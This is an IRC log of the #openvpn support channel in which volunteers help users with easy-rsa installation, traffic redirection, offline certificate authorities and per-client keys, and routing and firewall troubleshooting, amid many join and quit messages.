[~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 252 seconds] 04:29 -!- AsadH [~AsadH@unaffiliated/asadh] has joined #openvpn 04:32 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 04:56 -!- js__ is now known as js_ 05:02 -!- novaflash is now known as novaflash_away 05:06 < maetrik> !welcome 05:06 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 05:06 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 05:06 < maetrik> !redirect 05:06 <@vpnHelper> "redirect" is (#1) to make all inet traffic flow through the vpn, you will need --redirect-gateway (see !def1), as well as IP forwarding (see !ipforward) and NAT (see !nat) enabled on the server. or (#2) you may need to use a different dns server when redirecting gateway, see !dns or !pushdns or (#3) if using ipv6 try: route-ipv6 2000::/3 or (#4) Handy troubleshooting flowchart: 05:06 <@vpnHelper> http://ircpimps.org/redirect.png 05:07 < maetrik> !howto 05:07 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 05:08 < maetrik> !sample 05:08 <@vpnHelper> "sample" is (#1) http://www.ircpimps.org/openvpn.configs for a working sample config or (#2) DO NOT use these configs until you understand the commands in them, read up on each first column of the configs in the manpage (see !man) or (#3) these configs are for a basic multi-user vpn, which you can then build upon to add lans or internet redirecting 05:11 -!- novaflash_away is now known as novaflash 05:14 -!- pa__ is now known as pa 05:15 -!- pa [~pa@host95-21-dynamic.61-82-r.retail.telecomitalia.it] has quit [Changing host] 05:15 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 05:21 -!- JSharpe__ is now known as JSharpe 05:29 -!- dazo [~dazo@openvpn/community/developer/dazo] has joined #openvpn 05:29 -!- mode/#openvpn [+o dazo] by ChanServ 05:48 -!- tcamuso__ [tcamuso@nat/redhat/x-eszrmkbdedmpenog] has joined #openvpn 05:52 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 256 seconds] 06:02 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 06:02 -!- sauce [sauce@unaffiliated/sauce] has quit [Excess Flood] 06:03 -!- sauce [sauce@unaffiliated/sauce] has joined #openvpn 06:16 -!- ade_b [~Ade@koln-5d81a61d.pool.mediaWays.net] has joined #openvpn 06:16 -!- ade_b [~Ade@koln-5d81a61d.pool.mediaWays.net] has quit [Changing host] 06:16 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 06:21 -!- mode/#openvpn [+o EugeneKay] by ChanServ 06:28 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 06:47 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Quit: Leaving] 06:47 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn 06:50 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has quit [Ping timeout: 256 seconds] 06:55 -!- You're now known as ecrist 06:55 -!- mode/#openvpn [+o ecrist] by ChanServ 06:58 * EugeneKay gives pants to ecrist 06:58 <@ecrist> ? 06:58 <@EugeneKay> I thought you might need them 06:58 <@ecrist> I'd have to wear them, in order to need them. 07:02 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 07:08 -!- rooth_ is now known as rooth 07:14 -!- Rough_ [Ah2k@114.31.8.194] has quit [Read error: Connection reset by peer] 07:14 -!- Ah2k [Ah2k@114.31.8.194] has joined #openvpn 07:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 07:28 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Ping timeout: 256 seconds] 07:35 -!- auska [~joel@unaffiliated/auska] has joined #openvpn 07:37 < auska> Hi! When I use openVPN I lost the ssh connection to my server. How can I configure openVPN to redirect all traffic except from the ssh? 07:37 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 07:41 -!- BasicXP [~basicxp@ubuntu/member/BasicXP] has joined #openvpn 07:44 -!- ade_b [~Ade@redhat/adeb] has quit [Remote host closed the connection] 07:45 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 07:46 -!- ade_b [~Ade@koln-5d81a61d.pool.mediaWays.net] has joined #openvpn 07:46 -!- ade_b [~Ade@koln-5d81a61d.pool.mediaWays.net] has quit [Changing host] 07:46 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 07:51 < maetrik> Is there an easy way to install easy-rsa on Ubuntu 12.04? 07:52 < maetrik> I've installed 2.3.0 and now need easy-rsa. 07:52 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 07:53 -!- penk [~dave@static-66-137-171-68.axsne.net] has joined #openvpn 07:55 < pekster> !easy-rsa 07:55 <@vpnHelper> "easy-rsa" is (#1) easy-rsa is a certificate generation utility. or (#2) Download here: https://github.com/OpenVPN/easy-rsa/downloads or (#3) Download easy-rsa from git hub at https://github.com/OpenVPN/easy-rsa 07:55 -!- TypoNe [~itsme@195.197.184.87] has quit [Quit: I shouldn't really be here - dircproxy 1.1.0] 07:55 < pekster> maetrik: ^^ 07:55 < maetrik> Yes, I have the download link. Just wondering how I should install. 07:55 -!- TypoNe [~itsme@195.197.184.87] has joined #openvpn 07:56 < pekster> auska: Is your "server" actually an openvpn "client" using --redirect-gateway, or do you mean you've somehow tried to use that directive on an OpenVPN peer configured as the server? 07:58 < maetrik> ah wait, i can install it with apt-get pekster 07:58 < pekster> auska: Since easy-rsa is just a collection of scripts, you can simply copy the 'easy-rsa/2.0' subdirectory somewhere useful and begin using it. That said, we've made some changes recently and you might be better off grabbing a copy of the latest development changes from here: https://github.com/OpenVPN/easy-rsa 07:58 <@vpnHelper> Title: OpenVPN/easy-rsa · GitHub (at github.com) 07:59 < pekster> I'm not sure about 12.04; I don't seem to see any easy-rsa in the repos for 12.10, but maybe my test VM is too new 07:59 < maetrik> ok 08:04 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 08:08 -!- p3rror [~mezgani@41.140.181.89] has joined #openvpn 08:08 -!- civillian [~nick@174.202.49.122-static.velocitynet.com.au] has joined #openvpn 08:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 08:10 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Client Quit] 08:14 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Quit: Leaving] 08:15 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:15 < rob0> You don't need easy-rsa to be in your distro package manager. In fact you should just run it from a non-root $HOME directory. 08:18 -!- AvatarAang [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 08:18 -!- Valcorb|| [~Valcorb@d54C68BC0.access.telenet.be] has quit [Client Quit] 08:18 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 245 seconds] 08:18 -!- AvatarAang is now known as Valcorb 08:29 -!- Pei_ is now known as Pei 08:36 -!- Ah2k [Ah2k@114.31.8.194] has quit [Read error: Connection reset by peer] 08:36 -!- Ah2k [Ah2k@114.31.8.194] has joined #openvpn 08:41 < maetrik> ok rob0 thanks 08:43 < maetrik> this is all new to me, i basically rent a small vps in the us so that i can watch some us only content from europe 08:44 < maetrik> so i need to setup openvpn server on that vpn 08:44 < maetrik> *vps 08:44 < maetrik> i'll get there, learning new stuff every day hah 08:49 < rob0> you definitely do NOT want to run easy-rsa on a VPS. It should be on a real, physical computer. 09:03 < maetrik> why? 09:03 < maetrik> you see i am learning here ;) 09:04 -!- kantlivelong [~kantlivel@home.kantlivelong.com] has joined #openvpn 09:05 < rob0> A virtual machine has no entropy source for random data, thus is not suitable for generating cryptographic keys. 09:05 < maetrik> what should i do? run it on my own machine? 09:05 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 09:12 < rob0> Your CA signing should not be done on the VPN server, either. That would mean if an attacker got shell and root on the server, they'd also gain control of your CA/PKI. Run easy-rsa on a real, physical computer, ideally, not one which is part of the VPN. 09:13 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:16 < maetrik> ok 09:25 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 09:47 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 09:48 < MacGyver> rob0: Well, that does really depend on the way the virtual machine's /dev/random works... But you can't trust it. 09:50 < pekster> Nope. It that's just the kernel's frontend for a device node to reference when you want a stream of psudo-random numbers. The magic happens on the other side dealing with entropy collection. VMs are going to have very poor entropy becauase they lack direct physical hardware that accounts for most of the valuable entropy on a modern computer 09:52 < MacGyver> pekster: You're assuming that it's isolated. There are VM-solutions where /dev/random is provided by the host kernel, and entropy collection can be done since that does have access to the physical hardware. 09:52 < MacGyver> pekster: So yes, it depends - but even in that case I wouldn't trust it. 09:53 < pekster> Right. And I still wouldn't want my CA in someone else's cluster computing environment 09:53 < MacGyver> One of the reasons why I wouldn't trust it. 09:54 < rob0> The most paranoid among us will keep the CA on a USB key and in a safe. 09:54 < MacGyver> Point is that there's far better reasons than "there's no entropy source" *not* to do this. 09:54 < MacGyver> Because "there's no entropy souce" isn't even always true. 09:54 < pekster> Entropy is a big deal. I recommend "Facthacks" from the 2012 29C3 09:54 < pekster> (1h talk, worth your time if you're into entropy and RSA keys and such) 09:55 < MacGyver> I know. I was there. 09:56 < MacGyver> And although entropy is a big deal, another thing you should've taken away from that talk is that pastebin is not secure cloud storage ;) 09:56 < MacGyver> (Well, really, that storing keys in the cloud is not a good idea in general.) 09:57 < MacGyver> My point is that when the only reason for not doing this, that you provide, is "there's no entropy", somebody will counter with "but there is in my setup", do it anyway, and then be bitten because of all the other things that are wrong with that setup. 09:57 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:57 < MacGyver> Anyway, I've gotta go to a meeting. 09:58 < pekster> I believe both big reasons were covered above, before any of this. entropy + system security 09:59 -!- amir [~amir@unaffiliated/amir] has quit [Remote host closed the connection] 09:59 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 10:00 -!- p3rror [~mezgani@41.140.181.89] has quit [Quit: Leaving] 10:30 -!- tcamuso__ [tcamuso@nat/redhat/x-eszrmkbdedmpenog] has quit [Ping timeout: 260 seconds] 10:30 -!- tcamuso__ [tcamuso@nat/redhat/x-qrycyeqthdldqtml] has joined #openvpn 10:32 -!- raidz is now known as raidz_away 10:32 -!- raidz_away is now known as raidz 10:36 -!- maetrik [maetrik@185.14.184.81] has left #openvpn [] 10:40 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has joined #openvpn 10:46 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 11:06 -!- Sickness\ [~stront@unaffiliated/s-work] has quit [Read error: Operation timed out] 11:06 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has quit [Read error: Operation timed out] 11:07 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has joined #openvpn 11:07 -!- Masxmasx{AFK} [~IetsVulga@u134.baconseed.org] has joined #openvpn 11:18 -!- amir [~amir@unaffiliated/amir] has joined #openvpn 11:22 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has quit [Quit: ZNC - http://znc.sourceforge.net] 11:24 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has joined #openvpn 11:24 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Read error: Connection reset by peer] 11:26 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 11:29 -!- simcop2387 [~simcop238@p3m/member/simcop2387] has joined #openvpn 11:33 -!- nutron [~nutron@unaffiliated/nutron] has joined #openvpn 11:35 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn 11:59 -!- mibofra [~mibofra@host244-161-dynamic.43-79-r.retail.telecomitalia.it] has joined #openvpn 11:59 < mibofra> hi :)) 12:00 < mibofra> Can anyone say me if open vpn doesn't use GRE? 12:00 < rob0> OpenVPN does not use GRE. 12:02 -!- bkrieg1337 [~bkrieg133@120.28.171.16] has quit [Quit: Leaving] 12:03 < mibofra> rob0 thanks :)), cos I've tried to use a pptp one, but my modem (strange XD ) doesn't support vpn passthrough (and GRE XD) so I can use a vpn pptp network only locally (very useful XD). So I've to try with OpenVPN 12:05 < mibofra> I've seen lots of howto configure a openvpn server... But there is an OpenVPN control gui :)) ? (or I've to use webmin) 12:06 < rob0> OpenVPN uses a single UDP port for transport, so it's usually easy to get through firewalls. (Can also use TCP.) I don't use any GUI, can't comment. 12:07 < mibofra> ok, so I've and udp port opened for my vpn server, so I'll use it 12:08 < mibofra> *an udp port XD 12:08 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Remote host closed the connection] 12:09 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 12:12 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 12:13 -!- mitz_ [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 12:19 -!- auska [~joel@unaffiliated/auska] has quit [Quit: Lost terminal] 12:20 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Ping timeout: 600 seconds] 12:24 -!- Sickness\ [~stront@wolfenstein.enemyterritory.org] has quit [Changing host] 12:24 -!- Sickness\ [~stront@unaffiliated/s-work] has joined #openvpn 12:43 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 12:43 -!- mibofra [~mibofra@host244-161-dynamic.43-79-r.retail.telecomitalia.it] has quit [Remote host closed the connection] 12:48 -!- Poster|w [poster@gateway/shell/bshellz.net/x-abfybiqhisdcpdwn] has joined #openvpn 12:52 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has joined #openvpn 12:52 -!- Masxmasx{AFK} is now known as Masxmasx 12:52 -!- Masxmasx [~IetsVulga@u134.baconseed.org] has quit [Changing host] 12:52 -!- Masxmasx [~IetsVulga@unaffiliated/masxmasx] has joined #openvpn 12:52 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: Connection reset by peer] 12:54 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 12:58 -!- tekzilla_ is now known as tekzilla 13:02 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: error:1408F119:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac] 13:02 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:02 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:02 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:07 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Remote host closed the connection] 13:08 -!- 77CAAU6MD [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:08 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:09 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:09 -!- 77CAAU6MD [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:09 -!- copper [~copper@unaffiliated/copper] has joined #openvpn 13:09 < copper> hi 13:10 < copper> I came here a short while ago complaining about smartphone battery usage, and blaming openvpn for Android 13:10 < copper> I was wrong. What was killing the battery, was my IRC client 13:10 < copper> specifically, the fact that I was present in a channel with lots of traffic 13:11 < copper> as soon as I parted that channel, I got my battery life back 13:11 < copper> Sorry for jumping to conclusions. 13:11 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has joined #openvpn 13:17 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:18 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Read error: error:1408F119:SSL routines:SSL3_GET_RECORD:decryption failed or bad record mac] 13:18 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:18 -!- 14WAAJ4FG [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:19 -!- 14WAAJ4FG [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:19 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has quit [Quit: Lost terminal] 13:23 -!- jtrucks [jtrucks@freenode/staff/lopsa.board.jtrucks] has joined #openvpn 13:50 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Read error: Operation timed out] 13:58 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 14:01 -!- zu [~zu@ks387228.kimsufi.com] has quit [Ping timeout: 256 seconds] 14:02 -!- zu [~zu@ks387228.kimsufi.com] has joined #openvpn 14:11 -!- Gruu_ [~Gruu@213.211.132.86.static.edpnet.net] has joined #openvpn 14:18 -!- hrenovo [~hrenovo@li469-37.members.linode.com] has joined #openvpn 14:19 < hrenovo> hi. So I have win7 client connected to openvpn server and I have 'redirect' enabled 14:19 -!- Gruu_ [~Gruu@213.211.132.86.static.edpnet.net] has quit [Quit: Gruu_] 14:20 < hrenovo> So if I have port forwarding rules in the router, are they now dismissed ? 14:20 < hrenovo> because all traffic goes to openvpn TAP interface 14:20 < hrenovo> ? 14:26 < pekster> hrenovo: That causes asymmetric routing as the reply from your internal system doesn't go back through your original router. Since you're probably performing NAT on the redirected traffic as it goes out your VPN server, it has a different source address and thet original sender will reject it. You have 2 choices to fix that: 14:27 < pekster> 1) Perform hairpin NAT where you have your router on your real Internet connection NAT the packets so they appear to your LAN client as if the router sent them (thus loosing any chance of knowing where they really came from) or 2) set up policy routing on your LAN client (not the router) to send traffic received on your exposed service back out your ISPs route, not via the VPN 14:32 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 245 seconds] 14:35 -!- Eagleman [~Eagleman@546BCD9F.cm-12-4d.dynamic.ziggo.nl] has quit [Ping timeout: 260 seconds] 14:36 -!- copper [~copper@unaffiliated/copper] has left #openvpn ["Leaving"] 14:52 -!- EddieBauer [~eddie@206-47-100-148.dsl.ncf.ca] has joined #openvpn 14:52 < EddieBauer> !welcome 14:52 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum 14:52 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict) 14:53 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 14:53 < EddieBauer> !ask 14:53 <@vpnHelper> "ask" is don't ask to ask, just ask your question please, see this link for how to get help on IRC: http://workaround.org/getting-help-on-irc 14:55 -!- lord4163 [~fabian@81-232-61-81-no226.tbcn.telia.com] has joined #openvpn 14:55 < lord4163> Hello 14:55 < EddieBauer> Hello. Could anyone explain to me the security-related dangers in distributing a single client.key to multiple users along with the config? Could someone sniff the traffic of another client with that key somehow? 14:56 < lord4163> what do I have to fill in EXPORT_COUTRY ? Im living in sweden???? 14:59 < EddieBauer> I'm currently distributing the same ca.crt, client.ovpn, client.crt, and client.key to multiple people so they can access the OpenVPN server. Is this a bad idea? Is there a better way of making it so anyone can connect to the VPN without needing a password? 15:00 < Aketzu> then all clients look exactly the same and you can disable them only all at once 15:01 < Aketzu> it's easy to script creating seperate client.crt + key for every client with different name... then you can identify clients in configs, set static ip:s, disable/revoke single clients etc. 15:01 < EddieBauer> I see... Assuming that it isn't particularly important to differentiate amongst clients, or have any fine-grained control over them, is this still an approach taht's safe? 15:02 < Aketzu> key is negotiated per session so I'd say yes 15:02 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 15:02 < Aketzu> (with static key it would use the same encryption key for all which is bad) 15:03 < EddieBauer> Ah ok. Thanks Aketzu. Regarding the scripting to create the client.crt and key, do you mean using the OpenVPN up script? 15:03 < Aketzu> nope, some different script.. when you create & distribute configs 15:03 < EddieBauer> Gotcha. Thanks again. 15:04 < Aketzu> paid access server does some of that magic automatically 15:05 < lord4163> What a disaster 15:07 < pekster> EddieBauer: With the same private key, one client who was able to capture a full session (the TLS negotiation is the importnat bit) could theoretically decrypt the entire stream into plaintext since that TLS session is what creates the session keys used to encrypt the data 15:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 15:09 -!- mode/#openvpn [+o krzee] by ChanServ 15:09 < pekster> lord4163: What are you referring to? If you're referring to the US cryptography export laws, I don't think they'd impact you in Sweden unless you're packaging something that needs to be export friendly *from* the US 15:09 < EddieBauer> I see. That makes sense. So best to generate the key on the client's end? 15:10 < lord4163> Couldn't you guys have made a simple bash script for installing OpenVPN I'm getting a headache. 15:10 < lord4163> pekster: I don't know I'm just a dumbass it seems, can't understand the installation process 15:11 < pekster> EddieBauer: Correct. Ideally your PKI system isn't on your server or any other VPN-connected host, and each client (and the server) generates their own keypair on the device to be used, and sends the signing request to thte CA. The CA signs it and sends back a certificate, both of which can happen in plaintext by merely verifying the hash or fingerprint with the sender if you're super-security concious 15:12 < pekster> lord4163: There are builds in alost all mainstream distros via their own package managers, and a build from source is the standard untar, ./configure, make, make install process. And Windows has a native installer too 15:12 < EddieBauer> Alright, thanks. 15:12 < lord4163> pekster: yeah but you have to configure it. 15:13 < pekster> !howto 15:13 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 15:13 -!- Ah2k is now known as Rough_ 15:15 < lord4163> pekster: Okay thx will read that tomorrow, I'm willing to switch from PPTP, it doesn't autoconnect to my VPN on Android. OpenVPN does right? 15:16 < pekster> I haven't yet used the android client, but openvpn has keepalive and restart support depending on configuration 15:16 < pekster> !keepalive 15:16 <@vpnHelper> "keepalive" is (#1) see --keepalive in the manual for how to make clients retry connecting if they get disconnected. or (#2) basically it is a wrapper for managing --ping and --ping-restart in server/client mode or (#3) if you use this, don't use --tls-exit and also avoid --single-session and --inactive 15:16 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Read error: Connection reset by peer] 15:17 < lord4163> awesome, will set this up tomorrow in virtualbox, then install it in production if it works fast :) 15:18 < lord4163> The Android client is really snappy. Really well done ;) 15:19 < lord4163> bye 15:19 -!- lord4163 [~fabian@81-232-61-81-no226.tbcn.telia.com] has left #openvpn [] 15:37 -!- dazo is now known as dazo_afk 15:39 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 15:41 -!- Six6siX_ [~six6six@jasmine1.sammybakar.com] has joined #openvpn 15:44 -!- ade_b [~Ade@redhat/adeb] has quit [Quit: Too sexy for his shirt] 15:44 -!- tcamuso__ [tcamuso@nat/redhat/x-qrycyeqthdldqtml] has quit [Ping timeout: 264 seconds] 15:53 -!- KaiForce [~chatzilla@adsl-70-228-81-145.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 15:57 -!- Orbi [~opera@anon-186-163.vpn.ipredator.se] has joined #openvpn 16:04 -!- mjixx [~markus@80.67.14.31] has quit [Ping timeout: 252 seconds] 16:16 -!- EddieBauer [~eddie@206-47-100-148.dsl.ncf.ca] has left #openvpn [] 16:16 -!- mjixx [~markus@80.67.14.31] has joined #openvpn 16:17 -!- master_o1_master [~master_of@p4FF24A89.dip.t-dialin.net] has joined #openvpn 16:20 -!- master_of_master [~master_of@p4FF247F7.dip.t-dialin.net] has quit [Ping timeout: 255 seconds] 16:20 -!- mete [~mete@mete.shell.la] has quit [Read error: Operation timed out] 16:23 -!- mete [~mete@mete.shell.la] has joined #openvpn 16:33 -!- Volkswagner [~eric@cpe-24-161-55-139.hvc.res.rr.com] has joined #openvpn 16:34 -!- penk [~dave@static-66-137-171-68.axsne.net] has quit [Quit: Linkinus - http://linkinus.com] 16:43 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 16:58 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Computer has gone to sleep.] 17:00 -!- Six6siX_ [~six6six@jasmine1.sammybakar.com] has quit [Ping timeout: 245 seconds] 17:02 < Volkswagner> Greetings, I have this config for server on WNDR3800 router running OpenWRT backfire http://pastebin.com/hhXWSGr5 17:03 < Volkswagner> Clients do connect, but can't ping server. Clients register a tun ip in the /tmp/ipp.txt 17:03 < Volkswagner> But clients don't show up in /var/log/openvpn-status.log while connected 17:04 < Volkswagner> Should my tun adapter on server be bridged to lan interface in router config? 17:05 < Volkswagner> This was the case when using tap device, not sure what to do with tun device 17:06 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has joined #openvpn 17:09 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 17:16 < pekster> Likely firewalls. OpenWRT makes a mess of firewalls, like most do-it-for-you frontends 17:17 <@krzee> you definitely don't bridge a tun device 17:17 <@krzee> you say you can't ping server… can the server ping them? 17:17 < pekster> The status log isn't instant, so it'll take whatever the default period is to refresh. The manpage doesn't actually list what that is, but IIRC is somewhere between 30 and 120 seconds 17:33 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection] 17:37 < pekster> (60s, just got around to looking it up in the sources.) 17:44 -!- Orbi [~opera@anon-186-163.vpn.ipredator.se] has left #openvpn [] 17:46 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has joined #openvpn 17:46 -!- TheWarden [~chatzilla@S0106e0469a3d83ef.ss.shawcable.net] has quit [Quit: ChatZilla 0.9.90 [Firefox 19.0.2/20130307023931]] 17:52 -!- Six6siX_ [~six6six@jasmine1.sammybakar.com] has joined #openvpn 17:54 -!- MeanderingCode_ [~Meanderin@71-213-190-2.albq.qwest.net] has joined #openvpn 17:54 -!- MeanderingCode [~Meanderin@71-213-190-2.albq.qwest.net] has quit [Ping timeout: 245 seconds] 17:55 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 18:01 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 18:02 < Volkswagner> pekster, krzee thanks. I waited several minutes to check status log 18:02 < Volkswagner> I'll dig deeper 18:03 <@krzee> you can update the status log manually as well 18:03 <@krzee> see SIGNALS in the manual 18:03 <@krzee> !man 18:03 <@vpnHelper> "man" is (#1) For man pages, see http://openvpn.net/index.php/open-source/documentation/manuals/ or (#2) the man pages are your friend! 18:07 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has joined #openvpn 18:07 -!- Six6siX_ [~six6six@jasmine1.sammybakar.com] has quit [Remote host closed the connection] 18:10 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 18:25 -!- aoeui [~aoeui@gateway/tor-sasl/aoeui] has joined #openvpn 18:33 -!- laner [~Lane@cpe-66-65-44-48.nyc.res.rr.com] has quit [Quit: Textual IRC Client: http://www.textualapp.com/] 19:17 -!- Poster|w [poster@gateway/shell/bshellz.net/x-abfybiqhisdcpdwn] has quit [Quit: leaving] 19:17 -!- Poster|w [poster@gateway/shell/bshellz.net/x-kbmtosvidzdqumpg] has joined #openvpn 19:21 -!- mitz [~mitz@KHP222227247006.ppp-bb.dion.ne.jp] has quit [Ping timeout: 240 seconds] 19:55 -!- troyt [~troyt@2001:1938:240:3000::3] has quit [Read error: Operation timed out] 20:02 -!- troyt [~troyt@2001:1938:240:3000::3] has joined #openvpn 20:14 -!- raidz is now known as raidz_away 20:40 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 260 seconds] 20:42 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 20:42 -!- nlopez [~quassel@198.211.102.196] has joined #openvpn 20:44 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 20:50 -!- Aprogas_ [aprogas@enki.aprogas.net] has joined #openvpn 20:50 -!- Aprogas [aprogas@enki.aprogas.net] has quit [Read error: Connection reset by peer] 20:51 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has quit [Read error: Connection reset by peer] 20:51 -!- Cybertinus [~Cybertinu@2001:828:405:30:83:96:177:42] has joined #openvpn 20:55 -!- nlopez [~quassel@198.211.102.196] has quit [Remote host closed the connection] 21:01 -!- nlopez [~quassel@198.211.102.196] has joined #openvpn 21:01 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 21:02 -!- nlopez 